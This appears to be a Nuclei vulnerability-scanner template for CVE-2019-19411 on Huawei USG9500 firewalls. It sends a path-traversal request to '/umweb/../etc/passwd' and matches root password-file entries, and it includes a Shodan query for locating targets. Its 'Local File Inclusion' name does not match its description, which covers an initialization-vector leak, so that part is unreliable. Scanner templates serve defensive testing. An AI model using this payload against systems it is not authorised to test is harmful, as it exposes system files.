2024-09-27 12:35:36 +00:00
id : CVE-2019-19411
2023-04-12 17:18:41 +00:00
info :
name : Huawei Firewall - Local File Inclusion
author : taielab
2024-09-30 07:22:36 +00:00
severity : low
description : |
USG9500 with versions of V500R001C30SPC100, V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, V500R005C00SPC100, V500R005C00SPC200 have an information leakage vulnerability. Due to improper processing of the initialization vector used in a specific encryption algorithm, an attacker who gains access to this cryptographic primitive may exploit this vulnerability to cause the value of the confidentiality associated with its use to be diminished.
reference :
- https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200115-01-firewall-en
2023-04-12 17:18:41 +00:00
classification :
2024-09-30 07:22:36 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score : 3.7
cve-id : CVE-2019-19411
cwe-id : CWE-665
epss-score : 0.00078
epss-percentile : 0.34692
cpe : cpe:2.3:h:huawei:usg9500:-:*:*:*:*:*:*:*
2023-04-12 17:18:41 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-10-14 11:27:55 +00:00
max-request : 1
2024-09-30 07:22:36 +00:00
vendor : huawei
product : usg9500
2023-04-12 17:18:41 +00:00
shodan-query : title:"HUAWEI"
2024-09-30 07:22:36 +00:00
tags : cve,cve2019,huawei,firewall,lfi
2023-04-12 17:18:41 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-04-12 17:18:41 +00:00
- method : GET
path :
- "{{BaseURL}}/umweb/../etc/passwd"
matchers-condition : and
matchers :
- type : regex
part : body
regex :
- "root:[x*]:0:0:"
2023-04-13 05:08:45 +00:00
- type : word
part : header
words :
- "application/octet-stream"
2023-04-12 17:18:41 +00:00
- type : status
status :
- 200
2024-10-05 08:35:50 +00:00
# digest: 4a0a0047304502201592da827242899c082ee79fadb679c8f4d09f39015c2826f479656d871f61d8022100b1df18deb058c6e3ab7a79da64776a7d4cecf21ca4f9a2fb6efee7785266ae55:922c64590222798bb761d5b6d8e72950
